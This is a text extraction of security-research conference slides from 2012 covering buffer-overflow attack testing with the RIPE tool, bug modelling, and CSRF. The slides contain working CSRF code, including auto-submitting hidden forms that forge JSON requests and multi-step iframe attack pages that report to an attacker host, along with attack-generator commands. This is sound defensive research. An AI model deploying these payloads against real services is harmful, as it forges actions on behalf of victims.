Application Security, in Six Parts (HackPra 2012)

Application Security, in Six Parts
The Developer Part of the Problem (slides 2-12)

Buﬀer Overﬂows (slides 13-63)

Modeling Security Bugs (slides 64-83)

Safety & Liveness Properties (slides 84-96)

CSRF Against RESTful Services (slides 97-130)

Multi-Step, Semi-Blind CSRF (slides 131-150)

@johnwilander at HackPra Feb 1 2012
Bochum, Germany

The Developer Part of
the Problem

Statistics from
AppSec Training
in Sweden ...

Out of 108 students

45 % said they write
security critical code

Years of So3ware Engineering Experience 
60 

50 
Number of Respondents 

40 

30 

20 

10 

0 
0‐2 years  2 ‐ 5 years  5 ‐ 10 years  10 to 15 years  15 ‐ 35 years

Programming languages you know 
80% 

70% 

60% 

50% 

40% 

30% 

20% 

10% 

0% 
Java  C#  C/C++  (Visual) Basic JavaScript  Perl  PHP  Python  Ruby  Other …

Security areas you have been working in 
80% 

70% 

60% 

50% 

40% 

30% 

20% 

10% 

0% 
Encryp2on and  Access Control  AAack  Security Tes2ng  Code Audit and  Enforcement  Opera2onal 
Digital  Preven2on and  Analysis  Policies for  Security Policies 
Signatures  Detec2on  Systems

Previous Security Traning 
80% 

70% 

60% 

50% 

40% 

30% 

20% 

10% 

0% 
No previous security  Cer<ﬁca<on (CISSP,  Training at college or  Professional training  Training on a speciﬁc 
training  CISM, ISSMP, SSCP …)  university  security product

Priori%za%on of System Features and Proper%es 
100% 

90% 

80% 

70% 

60% 

50% 

40% 

30% 

20% 

10% 

0% 

Features speciﬁed  Availability and  Usability  Performance  Maintainability  Security and Privacy  Features not 
Up@me  speciﬁed but likely 
to be needed

Frontend developer at
Svenska Handelsbanken

Researcher in application security
Co-leader OWASP Sweden

@johnwilander
johnwilander.com (music)
johnwilander.se (papers etc)

100% 

Push
90% 

80% 

70% 

60% 

50% 

40% 

30% 

20% 

10% 

0% 

to be needed


Priorities
100% 

Push
90% 

80% 

70% 

60% 

50% 

40% 

30% 

20% 

10% 

0% 

to be needed


Priorities
100% 

90% 

80% 

70% 

60% 

50% 

40% 

30% 

20% 

10% 

0% 

to be needed

RIPE:
Runtime Intrusion
Prevention Evaluator
Published in the Proceedings of the 27th Annual
Computer Security Applications Conference 2011

Joint work with Nick Nikiforakis & Yves Younan
http://johnwilander.se/research_publications/
paper_acsac2011_wilander_nikiforakis_younan_kamkar_joosen.pdf

RIPE is ...

... a deliberately vulnerable C program

... that attacks itself,

... to allow evaluation of countermeasures.

RIPE contributions:

850 working buﬀer overﬂow attack forms

Evaluation of 8 countermeasures

7% to 89% of attack forms prohibited

RIPE download (MIT license):

https://github.com/johnwilander/RIPE

A Quick Look at

How RIPE Works

RIPE backend

Backend Performs
(C) one attack
per execution

Can be run
stand-alone,
command-line

RIPE backend

./ripe_attack_generator
Backend Performs
(C)
-t direct -i simplenop -c one attack
ret
per execution
-l stack -f strcpy
Can be run
stand-alone,
command-line

RIPE frontend

Frontend Drives Backend
(Python) (C)

Report

RIPE frontend

python ripe_tester.py
(Python) (C)
{direct|indirect|both}
number of times to repeat tests

Report

RIPE frontend

(Python)
python ripe_tester.py(C) both 5

Report

Which Attack Forms
are Possible?

NDSS ’03 Testbed

Target
20 attack forms

Technique
n
at io
L oc

NDSS ’03 Testbed

Target
Att 850 attack forms
ack
cod
e
Technique
n
at io
oc Fu
L nc
tio
n

ACSAC ’11 Testbed
• RET
• Old base ptr

Target
• Func ptr
Att • Longjmp buffer
ack • Struct with buffer & func ptr
cod
e
Technique
n
at io
oc Fu
L nc
tio
n

ACSAC ’11 Testbed

Target
Att
ack
cod
e
Technique • Direct
n
at io • Indirect
oc Fu
L nc
tio
n

ACSAC ’11 Testbed

Target
Att
ack
cod
e
Technique
n
at io •memcpy
oc Fu
L nc •str(n)cpy
tio •s(n)printf
n •str(n)cat
•{s|f}scanf
• loop equiv of memcpy

ACSAC ’11 Testbed

Target
Att
ack
cod
e
Technique
n
at io
oc Fu
L nc
• Stack (local var & param) tio
n
• Heap
• BSS
• Data

ACSAC ’11 Testbed
• Shellcode

Target
• Shellcode + NOP
• Shellcode + Polym. NOP
• Create ﬁle Att
ack
• Return-into-libc cod
• ROP e
Technique
n
at io
oc Fu
L nc
tio
n

Direct Overﬂow with Injected Code

Vulnerable Other variables Target code
buffer pointer
Optional Attack code Padded Address N
NOP sled, (shell code bytes back to u
simple or or NOP sled or l
polymorph create ﬁle) attack code l

./ripe_attack_generator -t direct -i simplenop -c ret
-l stack -f strcpy

Overﬂow Within Struct
Struct

Vulnerable Other Function
buffer variables pointer
Optional Attack code Address
NOP sled, (shell code back to
simple or or NOP sled or
polymorph create ﬁle) attack code

./ripe_attack_generator -t direct -i nonop
-c structfuncptrstack -l stack -f strcpy

Indirect Overﬂow
Vulnerable Other variables General
buffer pointer
Optional Attack code Padded Address N
NOP sled, (shell code bytes back to u
simple or or NOP sled or l
polymorph create ﬁle) attack code l

Target code
pointer

./ripe_attack_generator -t indirect -i nonop -c ret
-l stack -f strcpy

Injected Stackframe
Vulnerable Other variables Old
buffer basepointer
Optional Attack code Fake Address N
NOP sled, (shell code stack to fake u
simple or or frame stack frame l
polymorph create ﬁle) l

./ripe_attack_generator -t indirect -i polynop
-c baseptr -l heap -f fscanf

All in all, 850 working
attack forms

Demo of RIPE on
Ubuntu 6.06 and 9.10

Countermeasures Evaluated
• ProPolice (canary-based, variable reorder)
• CRED (boundary checking, referent object)
• StackShield, Libverify (copy & check)
• Libsafe, LibsafePlus, LibsafePlus+TIED
(library wrappers)

• PAE & XD (non-executable memory)

ProPolice

Old
Local Local
Guard Base RET
variables buffers
Ptr

sorted

CRED
Base Extent

Referent objects
Base Extent Base Extent


ptr

CRED
Base Extent



Any pointer dereferencing
ptr
has to stay within bounds

CRED
Base Extent


Base Extent Base Extent Out-of-bounds object
Obj Value
Pointers allowed to be
out of bounds during ptr
artihmetics

Stack Shield

Global RET stack

Stack frame A
RET A RET A

Stack Shield

Stack frame B
Global RET stack RET B

RET B Stack frame A
RET A

Stack Shield
Stack frame B
RET B
Global RET stack

RET B Stack frame A
RET A

Stack Shield
Stack

Heap

BSS

Data segment
Boundary Function pointers
Text segment
have to point here

Libverify
Stack

Heap

BSS

Data segment

Text segment

Libverify
Stack

Heap

BSS

Data segment

All functions
Text segment

Libverify
Stack

Heap
Copy all
BSS functions
to the
Data segment
heap
All functions
Text segment

Libverify
Stack
Instrument all
functions to copy
RET B
their RET to a
RET A
All functions canary stack and
Heap check it before
return
BSS

Data segment

Text segment

Libsafe
Library functions may
never overwrite a
buffer pass the old
base pointer
Boundary
Old base pointer

RET

Parameters

LibsafePlus & TIED

Binary
Source Compile
code with -g
Debug info

LibsafePlus & TIED

Binary Libsafe-Plus

Debug info TIED

LibsafePlus & TIED

Binary Libsafe-Plus Offset from
frame pointer
and size for
Debug info TIED all buffers

LibsafePlus & TIED
Instruments all functions
to check bounds

Binary Libsafe-Plus Offset from
frame pointer
and size for
Debug info TIED all buffers

Non-Executable Memory (XD + PAE)

Stack
W

W⊻X Heap W
writable XOR executable
BSS W
Data segment W
Text segment X

Empirical Evaluation
Results

Results
Effective Successful Partly Failed
attacks successful attacks
-ness
Ubuntu 6.06 (no protection) 0% 99% 1% 0%
Libsafe 7% 91% 2% 7%
LibsafePlus 19% 79% 2% 19%
StackShield 36% 63% 1% 36%
ProPolice 40% 59% 1% 40%
LibsafePlus + TIED 77% 20% 3% 77%
CRED 79% 20% 0.5% 79%
Ubuntu 9.10 (W⊻X + ProP) 89% 9% 1% 89%

Results, top 4

-ness
ProPolice 40% 59% 1% 40%
CRED 79% 20% 0.5% 79%
Ubuntu 9.10 (W⊻X + ProPolice) 89% 9% 1% 89%

Results, top 4

-ness
ProPolice 40% 59% 1% 40%
Totally focused on protecting the stack.
CRED heap/BSS/data-based attacks against longjmp buffers as stack79%
Indirect, 79% 20% 0.5%
variables or function parameters not fully stable and thus categorized as
Ubuntusuccessful.
partly
9.10 (W⊻X + CRED) 89% 9% 1% 89%

Results, top 4

-ness
ProPolice 40% 59% 1% 40%
CRED wrap memcpy or loop equivalent of memcpy.
Doen’t 79% 20% 0.5% 79%
Spurious successful attacks CRED) 89% functions explains the fairly
abusing wrapped
Ubuntu 9.10 (W⊻X +
high ”Partly successful” ﬁgure.
9% 1% 89%

Results, top 4
Fails to protect against direct and indirect, stack/BSS/data-based
overﬂows toward function pointers, longjmp buffers, and structs for
Effective Successful Partly
sprintf(), snprintf(), sscanf(), and fscanf().
Failed
Attacks against structs also successful -ness
for memcpy() and loop equivalent
ProPolice only attacks successful from buffers on the heap.
and are the 40% 59% 1% 40%
CRED 79% 20% 0.5% 79%
Ubuntu 9.10 (W⊻X + CRED) 89% 9% 1% 89%

Results, top 4
All code injection countermeasured. Apart from that:
All struct attack forms were successful.
Effective heap and the
All direct attacks against function pointers on theSuccessful Partly data Failed
segment were successful. -ness
Indirect attacks against the old base pointer work in general on the
ProPolice and data segment for memcpy(), strcpy(), strncpy(), sprintf(),
heap, BSS, 40% 59% 1% 40%
LibsafePlusstrcat(), strncat(), sscanf(), fscanf(), and loop equivalent. 77%
snprintf(), + TIED 77% 20% 3%
CRED 79% 20% 0.5% 79%
Ubuntu 9.10 (W⊻X + CRED) 89% 9% 1% 89%

Modeling, Visualizing,
and Pattern Matching
Security Bugs
Published in E-Proceedings of Workshop on
Code Based Software Security Assessments 2005

Joint work with Pia Fåk
http://johnwilander.se/research_publications/paper_cobassa2005_wilander_fak.pdf

Textual Models
// Start state. Matches any copy_from_user
// call and puts parameter x in tainted state.
start: { copy_from_user(x, y, len) }
==> x.tainted
;
// Catch operations illegal on unsafe values.
x.tainted, x.need_ub, x.need_lb:
{ v[x] } ==>{ err(”Dangerous index!”); }
...
;

Textual Feedback

Johns_program.c:7:3: Possible out-of-bounds store:
strcpy(buffer, input_string)
Unable to resolve constraint:
requires maxRead(input_string @ test.c:7:18) <= 7
needed to satisfy precondition:
requires maxSet(buffer @ test.c:7:10) >=
maxRead(input_string @ test.c:7:18)
derived from strcpy precondition:
requires maxSet(<parameter 1>) >=
maxRead(<parameter 2>)

Data Dependence

int func(int user_input){
user_input
int var;
...
var = user_input * 5;
...
}

var = ...

Control Dependence

int func(int user_input){
if(var <= 0) int var;
...
if(var <= 0)
var = 0;
...
}

var = 0;

Input Validation
Model of good programming practice

External int func(int user_input){
input int var;
...
var = user_input * 5;
...
def var if(var >= 0 && var < MAX)
for(i = 0; i < var; i++)
array[i] = 0;
...
validate var }

use var

Normal Use of free()
Model of good programming practice

call free()
A call to free()
binds the buf reference char *buf=(char *)malloc(MAX);
...
to the input parameter free(buf);
ptr_in.
ptr_in=buf

Double free()
Model of bad programming practice

call free() 1 call free() 2 char *buf=(char *)malloc(MAX);
...
free(buf);
...
free(buf);
ptr_in_1=buf ptr_in_2=buf

In the case of double free()
there’s a data dependence
from one call to free() and
the subsequent input parameter
ptr_in.

Detect Correct Use of
free() Not Enough
entry main()

call malloc() call free()

ptr_in=buf

We Have To Detect
Incorrect Use of free()
entry main()

call malloc() call free() 1 call free() 2

The graph with incorrect use of
free() contains a subgraph with ptr_in_1=buf ptr_in_2=buf
correct programming practice.

Static Analysis for Security
Must Look For
Both Good and Bad
Programming Practice

Can We Use Graphs for
Developer Feedback?
• More inaccuracy lower severity

• Exploit dual of models

Possible execution path
No validation
without validation
External External
input input

def var def var

validate var

use var use var

Mandatory validation but Mandatory validation but
narrowing type-cast on narrowing type-cast on
validation path usage path
External External
input input

Narrowing def var def var
type-cast

Narrowing
validate var validate var type-cast

use var use var

On a Higher Level
Incoming
XML

Demarshalling
DOM parsing

validate object SAX parsing

use object

Safety and Liveness
Properties of Code
Just to put things in perspective

I Asked Myself …

• Can execution monitoring solve the
software security problem?
• Can we analyze and test for security
compile-time?

Blacklist vs Whitelist

Build model Build model
of bad stuﬀ of good stuﬀ


Build model Build model
of bad stuﬀ of good stuﬀ

Pattern match Detect execution
inside the model outside the model
and raise alarm and raise alarm


Blacklist Whitelist
== ==
model of model of
abnormal normal
behavior behavior


Blacklist Whitelist
== ==
model of model of
abnormal normal
behavior behavior

We always detect bad things

So, is software security
all about avoiding/
detecting bad things?

So, is software security
allNot formally
about avoiding/
detecting bad things?

Safety Liveness
• No ”bad” thing must • A ”good” thing must
happen during (eventually) happen
execution. during execution
Bad state is discrete.
• Not enforceable via
• Enforceable via execution monitoring –
execution monitoring – there’s no way of
prohibit a state detecting that the good
transition from a safe thing won’t happen
state to an unsafe state eventually

Safety Liveness
• Access Control • Starvation Freedom
Good thing ==
• Mutual Exclusion making progress
Bad thing ==
Two threads executing • Availability
in the critical section (guaranteed service)
Good thing ==
• Deadlock Freedom Every request serviced
Bad thing ==
Deadlock :) • Termination
Lamport 1977 http://www.cis.umassd.edu/~hxu/courses/cis481/references/Lamport-1977.pdf
Alpern, Schneider 1984 http://ecommons.library.cornell.edu/bitstream/1813/6495/1/85-650.pdf


Safety Properties Liveness Properties

We always detect violations of safety properties

This means we have to

stick to
safety properties
if we want to enforce them

Final part.

CSRF
against RESTful services
and in several, semi-blind steps

Cross-Site Request Forgery
Request For
gery

Cro
ss-S
ite

Cross-Site Request Forgery

Request Forgery
Cros
s-Sit
e
Ph
ish
ing

What’s on your mind? What’s on your mind?
POST POST

I love OWASP! POST POST

I love OWASP! POST POST

John: I love OWASP!

POST I hate OWASP! POST

POST I hate OWASP! POST

John: I hate OWASP!

POST <form id="target" method="POST"
action="https://1-liner.org/form">
John: I hate OWASP! <input type="text" value="I hate
OWASP!" name="oneLiner"/>
<input type="submit"
value="POST"/>
</form>

<script type="text/javascript">
$(document).ready(function() {
$('#form').submit();
});
</script>

<form id="target" method="POST"
action="https://1-liner.org/form">
<input type="text" value="I hate
OWASP!" name="oneLiner"/>
<input type="submit"
value="POST"/>
POST
</form>
John: I hate OWASP!

<script>
$(document).ready(function() {
$('#target').submit();
});
</script>

There used to be a
protection in web 1.5

Forced Browsing
wizard-style

Shipment info ✉ Payment info $

Next Buy!

Forced Browsing
wizard-style

Shipment info ✉ Payment info $

Token

Next Buy!

Forced Browsing
wizard-style

Token 1 Token 2 Token 3

Forced Browsing
wizard-style


State built up i steps, server roundtrip in-between

Forced Browsing
wizard-style


fo rge
n’t to
uld est
Co qu
re t step
las out a
w tith oken
va lid

RIA & client-side state

{
”purchase”: {}
}


{
”purchase”: {
”items”: [{}]
}
}


{
”purchase”: {
”items”: [{},{}]
}
}


{
”purchase”: {
”items”: [{},{}],
”shipment”: {}
}
}


{
”purchase”: {
”items”: [{},{}],
”shipment”: {},
”payment”: {}
}
}

Can an attacker forge
such a JSON structure?

CSRF possible?
{
”purchase”: {
”items”: [{},{}],
”shipment”: {},
”payment”: {}
}
}

action="https://vulnerable.1-liner.org:
8444/ws/oneliners">

<input type="text"
name=””
value="" />

<input type="submit" value="Go" />

</form>

8444/ws/oneliners"
style="visibility:hidden">

<input type="text"
name=””
value="" />


</form>

8444/ws/oneliners"
style="visibility:hidden"
enctype="text/plain">

<input type="text"
name=””
value="" />


</form>

8444/ws/oneliners"
Forms produce a request body that
looks like this:
<input type="text"
name=””
theName=theValue
value="" />
... and that’s not valid JSON.


</form>

8444/ws/oneliners"

<input type="text"
name='{"id": 0, "nickName": "John",
"oneLiner": "I hate OWASP!",
"timestamp": "20111006"}//'
value="dummy" />


</form>

8444/ws/oneliners"
style="visibility:hidden" body that looks
Produces a request
like this:

<input type="text" 0, "nickName":
{"id":
name='{"id": "John","oneLiner": "I
0, "nickName": "John",
hate OWASP!","timestamp":
"oneLiner": "I hate OWASP!",
"20111006"}//=dummy
"timestamp": "20111006"}//'
value="dummy" />
... and that is acceptable JSON!

</form>

Demo POST CSRF
against REST service

Important in your REST API
• Restrict HTTP method, e.g. POST
Easier to do CSRF with GET

• Restrict to AJAX if applicable
X-Requested-With:XMLHttpRequest
Cross-domain AJAX prohibited by default

• Restrict media type(s), e.g. application/json
HTML forms only allow URL encoded, multi-part
and text/plain

What about ”no tokens but several steps”?

Step 1 Step 2 Step 3


State built up i steps, server roundtrip in-between


rg ed
Fo t to
qu es is
r e tep
t s id
las al
inv

Can we forge timed GETs and POSTs
in a deterministic, non-blind way?


1 2 3 4

csrfMultiDriver.html

invisible
iframe
csrfMulti0.html


invisible invisible
iframe iframe
target0.html csrfMulti1.html

Wait


invisible invisible invisible
iframe iframe iframe
target0.html target1.html csrfMulti2.html

Wait


invisible invisible invisible invisible
iframe iframe iframe iframe
target0.html target1.html target2.html csrfMulti3.html

Wait


invisible invisible invisible invisible
iframe iframe iframe iframe
target0.html target1.html target2.html target3.html

<!DOCTYPE html>
<html>
<head>
<script>
var IFRAME_ID = "0", GET_SRC =
"http://www.vulnerable.com/some.html?param=1";
</script>
<script src="../iframeGetter.js"></script>
</head>
<body onload="IFRAME_GETTER.onLoad()">
Extra easy to CSRF since it's done with HTTP GET.
</body>
</html>

csrfMulti0.html

<!DOCTYPE html>
<html>
<head>
<script>
var IFRAME_ID = "1";
</script>
<script src="../iframePoster.js"></script>
</head>
<body onload="IFRAME_POSTER.onLoad()">

action="https://www.vulnerable.com/addBasket.html"
style="visibility:hidden">
<input type="text" name="goodsId"
value="95a0b76bde6b1c76e05e28595fdf5813" />
<input type="text" name="numberOfItems" value="1" />
<input type="text" name="country" value="SWE" />
<input type="text" name="proceed" value="To checkout" />
</form>

</body>
</html>
csrfMulti1.html

return {
checkIFrames : function() {
var frame;
for (var i = 0; i < frames.length; i++) {
frame = frames[i];
if (!frame.hasOpenedIFrame) {
appendIFrame(frame);
frame.hasOpenedIFrame = true;
break; // Only open one iframe at the time
} else if(frame.hasPosted == "no") {
frame.hasPosted = "maybe";
break; // iframe not done posting, wait
} else if(frame.hasPosted == "maybe") {
frame.hasPosted = "yes";
break; // iframe not done posting, wait
} else if (frame.hasPosted == "yes") {
continue; // Time to allow for the next iframe to open
}
}
},

receiveMessage : function(event) {
if (event.origin == "https://attackr.se:8444") {
CSRF.frames[parseInt(event.data)].hasPosted = "no";
// Still on CSRF page so POST not done yet
}
}

Demo Multi-Step,
Semi-Blind CSRF
against 2 high-proﬁle online
shops in the EU where I’ve
spent €1000s myself
No video recording, please ;)

Thanks!
Let’s all meet at
OWASP AppSec Research 2012
http://www.appsecresearch.org/

@johnwilander

Application Security, in Six Parts (HackPra 2012)

Empfohlen

Empfohlen

Weitere ähnliche Inhalte

Ähnlich wie Application Security, in Six Parts (HackPra 2012)

Ähnlich wie Application Security, in Six Parts (HackPra 2012) (20)

Mehr von johnwilander

Mehr von johnwilander (7)

Kürzlich hochgeladen

Kürzlich hochgeladen (20)

Application Security, in Six Parts (HackPra 2012)